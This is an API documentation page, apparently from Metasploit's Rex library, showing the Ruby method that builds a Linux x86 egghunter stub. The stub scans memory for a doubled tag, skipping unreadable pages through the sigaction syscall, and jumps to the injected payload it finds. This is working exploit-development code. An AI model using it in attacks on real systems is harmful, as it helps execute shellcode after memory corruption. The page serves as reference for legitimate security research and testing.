Module: Rex::Exploitation::Egghunter::Linux::X86

Defined in:
lib/rex/exploitation/egghunter.rb

Constant Summary collapse

Alias =
Rex::Arch::ARCH_X86

Instance Method Summary collapse

Instance Method Details

#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object

The egg hunter stub for linux/x86.

Raises:

  • (RuntimeError)


258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
# File 'lib/rex/exploitation/egghunter.rb', line 258

def hunter_stub(payload, badchars = '', opts = {})

  startreg = opts[:startreg]

  raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
  marker = "0x%x" % opts[:eggtag].unpack('V').first

  checksum = checksum_stub(payload, badchars, opts)

  startstub = ''
  if startreg
    if startreg.downcase != 'ecx'
      startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
    else
      startstub = "\n\tjmp next_addr"
    end
  end
  startstub << "\n\t" if startstub.length > 0

  assembly = <<EOS
  cld
#{startstub}
check_readable:
  or cx,0xfff
next_addr:
  inc ecx
  push 0x43   ; use 'sigaction' syscall
  pop eax
  int 0x80
  cmp al,0xf2
  je check_readable

check_for_tag:
  ; check that the tag matches once
  mov eax,#{marker}
  mov edi,ecx
  scasd
  jne next_addr
  ; it must match a second time too
  scasd
  jne next_addr

  ; check the checksum if the feature is enabled
#{checksum}

  ; jump to the payload
  jmp edi
EOS

  assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

  # return the stub
  assembled_code
end